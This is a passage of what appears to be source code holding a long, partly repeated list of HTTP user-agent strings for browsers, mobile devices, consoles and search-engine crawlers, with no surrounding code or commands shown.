'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
